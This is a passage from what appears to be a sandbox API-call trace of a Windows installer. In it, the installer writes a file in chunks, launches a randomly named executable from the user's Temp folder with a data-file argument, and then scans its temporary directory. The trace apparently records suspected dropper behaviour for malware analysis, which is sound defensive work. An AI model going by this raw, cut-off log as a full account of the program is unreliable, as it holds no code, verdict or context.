lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.020] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.022] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.022] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.022] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.023] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.023] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.023] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.024] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.024] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.024] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.024] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.025] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.025] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.025] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.025] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.026] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.026] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.026] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.027] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.027] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.027] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.027] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.028] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.028] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.028] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.029] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.029] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.029] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.029] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.030] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.030] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.030] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.030] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.032] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.032] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.032] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.032] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.033] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0057.033] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0057.033] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x200, lpOverlapped=0x0) returned 1 [0057.033] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x200, lpOverlapped=0x0) returned 1 [0057.034] SetFileTime (hFile=0x28, lpCreationTime=0x19fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x19fd8c) returned 1 [0057.034] CloseHandle (hObject=0x28) returned 1 [0057.044] lstrcpynA (in: lpString1=0x422f21, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0057.044] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0057.044] lstrcpynA (in: lpString1=0x422f56, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0057.044] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0057.044] lstrcpynA (in: lpString1=0x409c50, lpString2="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb") returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" [0057.044] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x422588*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fbe4 | out: lpCommandLine="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb", lpProcessInformation=0x19fbe4*(hProcess=0x1f8, hThread=0x28, dwProcessId=0xbac, dwThreadId=0x1e0)) returned 1 [0057.090] CloseHandle (hObject=0x28) returned 1 [0057.090] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0057.218] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0057.218] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0057.406] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0057.406] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0057.729] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0057.729] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0058.826] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0058.826] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0058.969] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0058.969] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0059.095] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0059.095] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0059.266] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0059.266] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0059.938] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0059.938] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0060.073] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0060.073] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0060.228] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0060.228] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0060.327] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0060.327] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0060.660] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0060.660] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0060.772] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0060.772] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0060.925] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0060.925] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0061.057] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0061.057] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0061.180] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0061.180] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0061.638] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0061.638] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x102 [0061.880] PeekMessageA (in: lpMsg=0x19fbd8, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19fbd8) returned 0 [0061.880] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0x64) returned 0x0 [0061.880] GetExitCodeProcess (in: hProcess=0x1f8, lpExitCode=0x19fd9c | out: lpExitCode=0x19fd9c*=0x0) returned 1 [0061.881] CloseHandle (hObject=0x1f8) returned 1 [0061.881] CloseHandle (hObject=0x200) returned 1 [0061.881] CloseHandle (hObject=0x1dc) returned 1 [0061.901] lstrcpynA (in: lpString1=0x421988, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0061.902] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0061.902] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8092087, ftCreationTime.dwHighDateTime=0x1d900af, ftLastAccessTime.dwLowDateTime=0xf8092087, ftLastAccessTime.dwHighDateTime=0x1d900af, ftLastWriteTime.dwLowDateTime=0xf8092087, ftLastWriteTime.dwHighDateTime=0x1d900af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x48a730, cFileName="nsg75B2.tmp", cAlternateFileName="")) returned 0x495888 [0061.903] FindClose (in: hFindFile=0x495888 | out: hFindFile=0x495888) returned 1 [0061.904] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0061.904] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0061.904] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xfb06242b, ftLastAccessTime.dwHighDateTime=0x1d900af, ftLastWriteTime.dwLowDateTime=0xfb06242b, ftLastWriteTime.dwHighDateTime=0x1d900af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x48a730, cFileName="Temp", cAlternateFileName="")) returned 0x4956c8 [0061.904] FindClose (in: hFindFile=0x4956c8 | out: hFindFile=0x4956c8) returned 1 [0061.904] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0061.905] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0061.905] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50b344cd, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x50b344cd, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x48a730, cFileName="Local", cAlternateFileName="")) returned 0x495488 [0061.905] FindClose (in: hFindFile=0x495488 | out: hFindFile=0x495488) returned 1 [0061.905] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0061.905] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0061.905] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x48a730, cFileName="AppData", cAlternateFileName="")) returned 0x4959c8 [0061.906] FindClose (in: hFindFile=0x4959c8 | out: hFindFile=0x4959c8) returned 1 [0061.906] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0061.906] lstrlenA (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0061.906] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x48a730, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4956c8 [0061.906] FindClose (in: hFindFile=0x4956c8 | out: hFindFile=0x4956c8) returned 1 [0061.906] lstrlenA (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0061.907] lstrlenA (lpString="C:\\Users") returned 8 [0061.907] FindFirstFileA (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x48a730, cFileName="Users", cAlternateFileName="")) returned 0x495b48 [0061.907] FindClose (in: hFindFile=0x495b48 | out: hFindFile=0x495b48) returned 1 [0061.907] lstrlenA (lpString="C:\\Users") returned 8 [0061.907] lstrlenA (lpString="C:") returned 2 [0061.907] lstrlenA (lpString="C:") returned 2 [0061.907] lstrcatA (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0061.907] GetFileAttributesA (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0061.907] lstrcpynA (in: lpString1=0x421588, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0061.908] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\*.*") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\*.*" [0061.908] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\" [0061.908] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\") returned 49 [0061.908] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp\\*.*"), lpFindFileData=0x19fc94 | out: lpFindFileData=0x19fc94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8092087, ftCreationTime.dwHighDateTime=0x1d900af, ftLastAccessTime.dwLowDateTime=0xf8092087, ftLastAccessTime.dwHighDateTime=0x1d900af, ftLastWriteTime.dwLowDateTime=0xf8092087, ftLastWriteTime.dwHighDateTime=0x1d900af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4956c8 [0061.908] FindNextFileA (in: hFindFile=0x4956c8, lpFindFileData=0x19fc94 | out: lpFindFileData=0x19fc94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8092087, ftCreationTime.dwHighDateTime=0x1d900af, ftLastAccessTime.dwLowDateTime=0xf8092087, 